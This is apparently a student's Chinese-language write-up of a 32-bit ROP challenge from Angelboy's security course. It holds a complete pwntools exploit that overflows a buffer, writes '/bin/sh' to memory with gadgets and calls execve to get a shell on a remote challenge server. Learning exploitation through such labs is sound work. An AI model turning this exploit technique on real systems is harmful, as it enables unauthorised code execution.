Angelboy PWN-6

這個月社團請到frozenkp講課,最近就一直在練PWN。
這題是Angelboy之前在台大計安上課用的題目。有錄影片在youtube上。
主要是32 bit ROP ,不曉得現在比賽還見不見得到?
攻擊步驟:
1.找塊rw的記憶體寫入 "/bin/sh\x00"
2.設好register值,去做execve的syscall

####################################################################################################
# 解答在 https://www.youtube.com/live/3vvYS09-IGA , 59:00 左右                                      
# 心得:                                                                                             
#### 寫入/bin/sh 出錯                                                                               
#### 原本用錯 gadget : 0x0807b301 : mov dword ptr [eax], edx ; ret                                 
#### 應該用這個: 0x0809a15d : mov dword ptr [edx], eax ; ret                                       
#### 我不知道 pwntools.flat可以用來幹嘛...壓縮 ROPchain?                                          
#### 想睡覺，沒看清楚只吃 100 bytes, 這樣我 ROPchain 限制 68 bytes 以內了                          
######################################################################  Wenyi Li , 2023/4/25 03:46 

from pwn import *
r = remote('120.114.62.210', 2126)
context.arch = "i386"
#r = process('./simplerop')
r.recvuntil(b'Your input :')
#r = gdb.debug('./simplerop')
offset = 32
pop_eax = p32(0x080bae06)
pop_eax_raw = 0x080bae06
pop_edx = 0x0806e82a
pop_edx_ecx_ebx = p32(0x0806e850)
pop_edx_ecx_ebx_raw = 0x0806e850
syscall = p32(0x0806eeec) # int 0x80
int80 = 0x080493e1
write = p32(0x0807b301)# mov dword ptr [eax], edx ; ret
write_raw = 0x0809a15d
memory = 0x80e9300
ropchain = b''
rop = b''
rop += flat([pop_edx,memory,pop_eax_raw,'/bin',write_raw])
rop += flat([pop_edx,memory+4 ,pop_eax_raw,'/sh\x00',write_raw])
rop += flat([pop_edx_ecx_ebx,0,0,memory,pop_eax_raw,0xb,int80])
print(len(rop))

"""太長而且 write-where gadget 用錯的 ROPchain
# Write '/bin/sh\x00' in memory address: 0x80e9200
ropchain += pop_edx_ecx_ebx
ropchain += p32(0x6e69622f) # '/bin'
ropchain += p32(0xdead005) # garbage
ropchain += p32(0xdead006) # garbage
ropchain += pop_eax
ropchain += p32(memory)
ropchain += write

ropchain += pop_edx_ecx_ebx
ropchain += p32(0x68732f2f) # '//sh'
ropchain += p32(0xdead0001) # garbage
ropchain += p32(0xdead002) # garbage
ropchain += pop_eax
ropchain += p32(memory + 4)
ropchain += write

# cleanup
#ropchain += p32(0x08054250) # xor eax;ret

ropchain += pop_edx_ecx_ebx
ropchain += p32(0) # '\x00\x00'
ropchain += p32(0) # garbage
ropchain += p32(memory) # garbage
ropchain += pop_eax
ropchain += p32(memory + 8)
ropchain += write

# Set registers and do syscall
ropchain += pop_eax
ropchain += p32(11)
#ropchain += pop_edx_ecx_ebx
#ropchain += p32(0)
#ropchain += p32(0)
#ropchain += p32(memory)
ropchain += syscall

print(len(ropchain))
"""
payload = (b'A'*offset) + rop
r.sendline(payload)

r.interactive()

view raw gistfile1.md hosted with ❤ by GitHub

好想睡覺...